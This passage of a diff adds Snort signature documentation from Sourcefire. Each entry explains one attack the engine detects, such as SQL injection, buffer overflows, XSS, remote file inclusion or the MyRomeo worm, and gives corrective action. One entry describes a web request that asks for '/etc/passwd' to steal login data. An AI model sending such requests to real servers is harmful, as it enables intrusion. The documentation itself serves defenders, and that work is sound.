+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000511.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000511
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "message.php" with SQL commands being passed as the "UserID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "UserID" parameter in the "message.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3457.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3457
+
+--
+Summary:
+This event is generated when an attempt is made to exploit
+a buffer overflow associated with the Arkeia Client Backup
+server.
+
+--
+Impact:
+A successful attack may cause a buffer overflow and the
+subsequent execution of arbitrary code at the privilege
+level of the vulnerable service.
+
+--
+Detailed Information:
+A vulnerability exists in the Arkeia Client Backup server
+software for a type 77 request. This may cause a buffer
+overflow and the subsequent execution of arbitrary code
+on a vulnerable server. The vulnerability is caused by
+an overly long message length.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker craft a malicious type 77 request and send
+it to a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+There can be multiple messages in one transfer. The event is generated
+on the first message only.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
--- /dev/null
+++ b/doc/signatures/2869.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2869
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_char
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2478.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2478
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/100000767.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000767
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "item" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "item" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1975.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1976
+
+--
+Summary:
+This event is generated when an attempt is made to supply an excessively
+long argument to an FTP command possibly in an attempt to exploit a buffer
+overflow vulnerability associated with CesarFTPD FTP server DELE command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists
+with the DELE command that can cause a buffer overflow and permit the
+execution of arbitrary commands with system privileges. The buffer
+overflow can be caused by supplying an overly long argument to the DELE
+command.
+
+Likewise, ArGoSoft FTP Server 1.4.2.8 suffers from a buffer overflow
+condition that can be exploited by supplying excess data as a parameter
+to the DELE command.
+
+--
+Affected Systems:
+	CesarFTP 0.98b
+	ArGoSoft FTP Server 1.4.2.8
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the DELE
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/12755
+
+--
--- /dev/null
+++ b/doc/signatures/1132.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1132
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/726.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+726
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/2928.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2928
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/115-3.txt
@@ -0,0 +1,69 @@
+
+
+Rule:
+
+--
+Sid:
+115-3
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an asn.1 oversized
+item, indicating a possible overflow attempt was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+This may indicate an attempt to overflow a fixed length buffer in an
+application using the asn1 libraries.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
--- /dev/null
+++ b/doc/signatures/3267.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3267
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3204.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3204
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1030.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1030
+
+--
+Summary:
+This event is generated when an attempt is made to access the search97.vts file.
+
+--
+Impact:
+Intelligence gathering, remote execution of files, denial of service.  This attack can permit the viewing and execution of files on the vulnerable server.  Additionally, a denial of service attack exists, allowing a remote user to shut down the Verity software. 
+
+--
+Detailed Information:
+The Verity/Search'97 software provides a search engine.  A vulnerability exists with a CGI script associated with Verity software because of improper input checking.  This may permit an attacker to access and execute files as well as shut down the Verity software.
+
+--
+Affected Systems:
+Verity Search97 2.1
+
+--
+Attack Scenarios:
+An attacker can craft a URL to access the vulnerable search97.vts file to remotely read or execute files, or cause a denial of service.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/162
+
+
+--
--- /dev/null
+++ b/doc/signatures/1464.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1464
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-1.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+111-1
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a network scan is in progress. That is, a TCP datastream has been
+detected that does not conform to normal activity.
+
+An attacker may be able to determine the characteristics of a remote
+system by sending abnormal network data. The response can reveal the
+operating system type, indicate the presence of a firewall or show open
+and closed ports on the host.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1122.txt
@@ -0,0 +1,66 @@
+Rule:
+
+Sid:
+--
+1122
+
+Summary:
+--
+This event is generated when an attempt is made to retrieve a protected
+system file on a host via a web request.
+
+--
+Impact:
+Information Gathering.
+
+--
+Detailed Information:
+The passwd file usually found in the /etc/ directory on UNIX based
+systems, contains login information for users of a host. If shadow
+password files are not being used, an attacker could obtain valid login
+information for the system by using widely available password cracking
+tools on the file.
+
+The file may also be used to garner information that may be used in
+brute force password guessing attacks against the host.
+
+--
+Affected Systems:
+	All UNIX based systems running a Web Server.
+ 
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 
+'/etc/passwd'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries 
+outside of it's designated web root or cgi-bin. This file may also be 
+requested on a command line should the attacker gain access to the 
+machine. Making the file read only by the superuser on the system will 
+disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1545.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1545
+
+--
+Summary:
+This event is generated when potential Denial of Service (DoS) traffic is detected on the network. 
+
+--
+Impact:
+Serious. A DoS attack may be underway.
+
+--
+Detailed Information:
+This event indicates that DoS traffic has been detected. An attempt to exhaust resources on a host may be underway leading to the host being unavailable for legitimate use.
+
+--
+Attack Scenarios:
+An attacker may attempt to exhaust resources available on a host leading to the host being unable to respond to legitimate requests.
+
+--
+Ease of Attack:
+Simple to Difficult.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000781.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000781
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "untrusted" parameter in the "go.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000325.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000325
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_cats.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_cats.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1097.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1097
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Talentsoft knowledge base:
+http://www.webplus.com/Issues/
+
+--
--- /dev/null
+++ b/doc/signatures/2981.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2981
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/428.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+428
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Parameter Problem datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP datagrams should never contain undefined ICMP Codes.  This is normally an indication of nefarious activity occurring on the network.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
